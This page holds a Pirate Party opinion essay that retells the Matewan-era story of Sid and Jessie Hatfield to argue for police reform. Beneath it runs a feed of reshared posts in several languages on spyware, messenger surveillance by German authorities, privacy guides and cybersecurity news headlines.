Of course, it’s not all sunshine. The Baldwin-Felts thugs haven’t been making your or Sid’s lives any easier since the massacre at Matewan.

In fact, your quick wedding was plenty of ammunition for the smear campaign.

Suddenly, rumors pop up and swirl that Sid himself was the one who shot Cabell, and it was so he could marry you.

But you know that’s not true. That’s all a rumor being spread by the pro-Baldwin-Felts camp and the media rags that support them. No one wants to ever call the Baldwin-Felts guys the bad guys in the paper, but what else could they be?

They’ve been breaking up your fellow West Virginian’s unionization attempts for years, before there was any implication of Bolshevism, and harder and more forcefully once there was that implication, even if the reality on the ground hadn’t changed.

They’ve done all they can to stop our boys from trying for a better life. They came at the behest and in service of the mining companies, and never to the aid of the poor worker doing the job.

Now, because Sid is becoming something of a workingman’s folk hero, they feel the need to discredit and smear his when and where they can.

You know Cabell asked Sid to take care of you and Jack. There was no plot between you and Sid to get rid of Cabell. The imminent danger, brought by the strike breakers, made it necessary to plan for the worst case scenario.

Now, that same camp of strike breakers aims to smear your new husband after making you a widow.

By January 1921, after six months of negative attention, Sid and 17 others are tried on murder charges, all stemming from the so-called “Battle of Matewan.”

All 18 were acquitted.

You are thrilled, and how could you not be? Sid was already a hero to miners across West Virginia (and maybe even nationwide), and now he’s a free man.

“Smilin’ Sid,” as some knew him as; that’s what the United Mine Workers film was called. He even got to be photographed with Mother Jones.

Truth be told, Mother Jones wasn’t nearly as dangerous as the media told you she was, but after seeing how the media talks about Sid, you already knew that.

Life goes on until Sid and his deputy, Edward Chambers, are accused of conspiracy.

In the town of Mohawk in McDowell County, a mining camp was shot up. The local mine guard said the perpetrators were being led by Sid and Edward to force the Mohawk miners to unionize.

Charles Lively, who is something of a double agent as you’d later come to find out, told the police he talked Sid, Edward and the miners into doing something drastic while at a restaurant. This testimony would lead to their arrest.

Union leaders said the story was bull, that the mine guards themselves were the shooters and that the accusations being levels were all to set up Hatfield and Chambers.

A distant cousin of Sid’s, Bill Hatfield, just so happens to be the McDowell county sheriff. He tells you guys that Sid and Edward would have the fullest protection.

Bill, however, would leave town for Virginia the day before he was so-desperately needed.

On August 1st, 1921, Sid Hatfield and Edward Chambers, unarmed with with their wives by the sides, were walking up the steps of the McDowell County Courthouse when several Baldwin-Felts thugs, including Charles Lively, began shooting the two men.

Your husband Sid dies instantly. Edward Chambers is finished off execution style with a bullet to the head from Lively.

You and Mrs. Chambers have both been widowed, and you have been widowed for the second time in 15 months.

None of the Baldwin-Felts thugs are even tried or held responsible for the killings.

All this would lead to the so-called “Battle of Blair Mountain,” the largest labor uprising in United States history, with 10,000 miners taking arms and rising up.

It would finally subside on September 2nd, when U.S. troops came to break it up, and the military veteran miners unwilling to fire on the troops, thus leading to the end of the uprising.

Take a step back, you’re no longer Jessie Maynard-Testerman-Hatfield: you’re you. You are reading about Jessie and the story surrounding her on the United States Pirate Party website, and you remember the point to this.

Protect and serve.

Looking at that story, who was being protected and served? And what?

The people are West Virginia, the miners, weren’t being protected and served. They were being frustrated at every turn when they sought out better working conditions, sometimes by force.

Sid? Sid Hatfield did what he could to protect and serve in his role as Police Chief of Matewan. In fact, Sid did just as much as any police officer could hope to do in protecting his community.

And he was shot for his troubles.

The people who killed police officer Sid Hatfield never were arrested or tried because they claimed “self-defense” against the unarmed Hatfield.

The Baldwin-Felts thugs protected and served, but they weren’t serving the community. They were tasked with protecting and serving the mining company from the community.

Was Jessie protected and served? She was twice widowed at the hands of Baldwin-Felts thugs, and no justice was ever served.

In fact, she herself was arrested in the middle of the story for “cohabiting while unmarried” and “committing adultery.”

So why are you, dear reader, being asked to go through all of this? Why would the United States Pirate Party want this story to be laid out and told the way that it has?

Lesser discussed in our platform is the plank “Police Reform.” In it, we call for things such as the demilitarization of the police, ending qualified immunity and civil asset forfeiture, requiring warrants for all forms of surveillance and end no-knock warrants, and ensuring nobody is put in jail for actions of basic survival.

In the story of Jessie Hatfield, we see many examples of why we call for such measures.

First of all, Sid Hatfield is the lone officer in the story to take on a purely community-based approach to law enforcement. Sid legitimately worked to protect and serve his community from overreaching mining companies and strike-breaking thugs.

And he was killed for his troubles.

Sid and Jessie, two consenting adults about to be married, were arrested in a major invasion of privacy and charge with a crime the state should have no power to enforce. This is a privacy issue as much as it is a policing issue.

Finally, individuals before institutions. Sid was the only person putting the individuals of his community above the institution of the mining industry. The protections of the worker were not kept in mind for the companies or the strike breakers, but was always considered with Hatfield.

Sid Hatfield is, by no stretch of the imagination, what we should be striving for when it comes to policing.

Earlier this decade, you saw anti-police sentiment hit a peak not seen in decades. “ACAB” and “Defund the Police” were rallying cries shouted by those who recognized the injustices perpetrated by modern policing.

And yet, the approach proved to be more harmful than not.

The actual issues of policing were not addressed properly, and instead of getting “defunded,” police departments got massive boosts in funding.

As you can see, the issues observed in the way policing is carried out is nothing new, and complaints of “Police serve capital” is hard to argue when the police act more as law enforcement as opposed to community servicemen.

So I bring you to this: protect and serve.

Was it the community in the story? Only if you’re talking about Sid Hatfield.

Unfortunately, not every officer is Sid Hatfield, nor is every motivation of an officer the same as Hatfield’s.

But Sid Hatfield shows that policing can be done in service of the community. How it ended should not sour the fact that it is indeed possible to how our police protect and serve the community.

The trend in policing we have seen is the militarization of our police forces. We have seen police officers, who are otherwise members of their community, taken out and put into a position to where they are often up against the community, not in support of it.

We have a large number of citizens that don’t trust the police, or are even scared of the police. It is that which we must be tasked with changing as a society.

Instead of calling for their defunding, or even the more honest demilitarization, I’d like to suggest a different rallying call when it comes to policing:

“Bring our police home.”

Bring back the beat cop. Bring back the police officer that walks down the street that you and your neighbors know and see everyday. Bring back the community servant. Per our platform, “Properly train our police forces with regular training in all aspects of the job. This will include but not limited to mental health assessments, first responder medical certification, community policing, & public engagement.”

Are all individuals who become police officers bastards? Of course not. Not everyone who becomes a cop is malicious or an inherently bad person. Hell, I’m willing to say most people aiming to become cops genuinely do so with the hope to protect and serve their community. Some might even see themselves as a Sid Hatfield type figure.

But as long as the policing remains in the shape that it is in, which is a bastardized form of protecting and serving, then the view that “all cops are bastards” will be hard to shake. Until that bastardization is done away with, the stigma of doing a bastard profession will reign true in the eyes of many.

If you truly want our police to protect and serve their community. If you truly want an end to no-knock warrants and the infringement of our privacy. If you truly want to end civil asset forfeiture and qualified immunity (which puts our officers in a position above, not in, the community). If you truly want to demilitarize the police, ending the 1033 Program and discouraging technique sharing between the neighborhood police and the military or federal intelligence agencies.

Then look at the positive role models history provides us. Look not at how it ended but what it was when it was happening.

If you truly want our police to protect and serve the community like they claim to, then I invite you to say it with me:

Bring our police home.


uspirates.org/through-the-spyg…

Elezioni e Politica 2026 reshared this.

14 students and opposition politicians targeted by spyware in Serbia


EDRi member SHARE Foundation has confirmed that at least 14 people in Serbia were targeted with advanced spyware since the beginning of 2026 – the largest documented wave of such surveillance in the country to date. Those targeted include members of the student movement, activists, a member of parliament, and a local councilor, all from opposition parties. The timing the of spyware attacks coincides with the local elections held on March 29, 2026.

The post 14 students and opposition politicians targeted by spyware in Serbia appeared first on European Digital Rights (EDRi).

Elezioni e Politica 2026 reshared this.

The Pirate Post ha ricondiviso questo.

Anstatt sich an neue EU-Regeln zu halten, haben Tech-Konzerne politische Werbung einfach verbannt. Dahinter steckt Kalkül.

Politiker:innen sollten nach den Landtagswahl deshalb nicht darüber diskutieren, wann sie endlich wieder bei Google und Meta werben können, sondern wie wir demokratischere Soziale Medien bekommen.

Ein Kommentar von @roofjoke

netzpolitik.org/2026/politisch…

The Pirate Post ha ricondiviso questo.

Verfassungsschutz und @bsi warnen: Angreifer übernehmen Messenger-Konten bei WhatsApp und Signal. Sie bekommen alle Nachrichten und volle Kontrolle.
Bundeskriminalamt und @Zoll übernehmen Messenger-Konten bei WhatsApp und Signal. Sie bekommen alle Nachrichten und volle Kontrolle.
netzpolitik.org/2026/messenger…
The Pirate Post ha ricondiviso questo.

⁉️ What can be done to protect people's privacy in today's day and age? 📰 noyb data protection lawyer Levan Lobzhanidze spoke with Canada's Globe and Mail about privacy, data protection and fundamental rights.

Read all about it here 👇
theglobeandmail.com/opinion/ar…

reshared this

The Pirate Post ha ricondiviso questo.

Generative Künstliche Intelligenz soll die Arbeit erleichtern, auch in der Schule. Mehrere Startups bieten KI-Feedback-Tools für Lehrkräfte und Schüler:innen an, etwa FelloFish und Edaira. Die seien für die Schule nicht geeignet, so der Forscher Sean Quägwer im Interview. netzpolitik.org/2026/ki-korrek…
The Pirate Post ha ricondiviso questo.

PrivaSì: la privacy online non è un miraggio


PrivaSì è una guida che Etica Digitale iniziò a stendere anni fa per dimostrare passo passo come la privacy online non sia un mito, bensì davvero ottenibile.

Partendo dal rendersi conto di quante informazioni vengono raccolte sul nostro conto e dal fatto che avere cose da nascondere non è da criminali bensì un aspetto umano, #PrivaSì scandaglia il mondo digitale che ci circonda per renderlo più comprensibile - il tutto con un linguaggio semplice e alla mano.

PrivaSì è divisa in livelli, a loro volta divisi in capitoli. Man mano che si va avanti, si tutela di più la propria sfera personale, ma persone diverse potrebbero volere livelli di privacy diversi: chi legge può quindi scegliere in autonomia quanto andare avanti e quando fermarsi, sviluppando un livello di consapevolezza sull'argomento che lə accompagnerà per tutta la vita.

Inizia l'avventura 👇
privasi.eticadigitale.org/

E se ti piace quel che vedi, le donazioni ci aiutano a continuare il progetto 👇
liberapay.com/EticaDigitale

@eticadigitale@feddit.it

Questa voce è stata modificata (1 settimana fa)
in reply to Etica Digitale

E' passato diverso tempo ormai da quando ho letto questa guida, era il periodo del covid.
E' fatta molto bene, e da quel momento ho aquisito una maggiore consapevolezza sulla privacy, ed ho iniziato un percorso di allontanamento dalle GAFAM.
La voglio rileggere per aggiornarmi e fare un punto della situazione attuale, e poi all'epoca alcune sezioni erano in fase di completamento.

GRAZIE per l'ottimo lavoro !!!

reshared this

The Pirate Post ha ricondiviso questo.

Tech-Konzerne haben politische Werbeanzeigen verboten. Die Wahlkämpfe in Ostdeutschland scheinen dadurch nicht ärmer, sondern vielfältiger geworden zu sein. Allerdings hat die Bedeutung von Social-Media-Algorithmen zugenommen – und die belohnen Populismus.

netzpolitik.org/2026/wahlen-oh…

The Pirate Post ha ricondiviso questo.

☕ CYBERBRIEFING — Mercoledì 2 settembre 2026

👉 Leggi tutti gli aggiornamenti delle ultime 24 ore:
ilpuntocyber.rfeed.it/article.…

#newsletter #cybersecurity
@informatica

The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Public HardBreacher Code Claims Kaspersky Privilege Escalation, but Evidence Remains Unverified
#CyberSecurity
securebulletin.com/public-hard…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

BGP Hijack Poisoned Virtualizor Updates and Put Hosting Servers at Root-Level Risk
#CyberSecurity
securebulletin.com/bgp-hijack-…
The Pirate Post ha ricondiviso questo.

Mit diesem Taschenspielertrick verschaffen sich Zoll, BKA und co. offenbar massenhaft Zugriff auf Messanger-Konten und lesen mit: "Messager-Überwachung" (Nutzung von Bestätigungs-Code innerhalb ihrer App) ist keine "TKÜ" - rechtlich und ethisch extrem bedenklich!

Danke @andre_meister für den guten Artikel und die Aufarbeitung dieses wichtigen Themas auf @netzpolitik_feed
netzpolitik.org/2026/messenger…

The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

D-Link Fixes Router Flaws That Exposed Admin and Wi-Fi Credentials on Local Networks
#CyberSecurity
securebulletin.com/d-link-fixe…
The Pirate Post ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

ValleyRAT Campaign Turns Fake Adware Installers Into a Persistent Espionage Backdoor
#CyberSecurity
securebulletin.com/valleyrat-c…
The Pirate Post ha ricondiviso questo.

Behörden überwachen regelmäßig Messenger-Kommunikation in WhatsApp, Telegram und Signal – ganz ohne Staatstrojaner. Das geht aus einem Dokument des Zollkriminalamts hervor, das wir veröffentlichen. Ein Professor für IT-Strafrecht hält diese Messenger-Überwachung für rechtswidrig. netzpolitik.org/2026/messenger…
in reply to netzpolitik.org

@signalapp
Using a desktop clients to surveil citizens and partners has be a pattern for a while.

Any plans of a response?

You could only allow saving login for iteratively increasing amounts of time before requiring re-auth. When first logging in max a day, on re-auth a week, than a month, ...

And additionally displaying regular notification in the app about who's reading messages.

#digitalviolence #stalking #surveillance #feminism
@netzpolitik_feed

in reply to netzpolitik.org

Moment mal kurz, steckt da nicht noch ein weiterer Aspekt drin, nämlich, dass im konkreten Beispiel nicht nur anscheinend wiederrechtlich die Kommunikation einer Beschuldigten überwacht wurde, sondern auch potentiell die gesamte Kommunikation ihrer Eltern? Und so wie ich es verstanden habe, sind die nicht Beschuldigt sondern nur Zeug:innen? Ich dachte, da sind die Beschränkungen noch viel krasser.
Edith: oder hab ich was überlesen.
Questa voce è stata modificata (1 settimana fa)
The Pirate Post ha ricondiviso questo.

Behörden überwachen regelmäßig Messenger-Kommunikation in WhatsApp, Telegram und @signalapp – ganz ohne Staatstrojaner. Das geht aus einem Dokument des @Zoll hervor, das wir veröffentlichen. Ein Professor für IT-Strafrecht hält diese Messenger-Überwachung für rechtswidrig. netzpolitik.org/2026/messenger…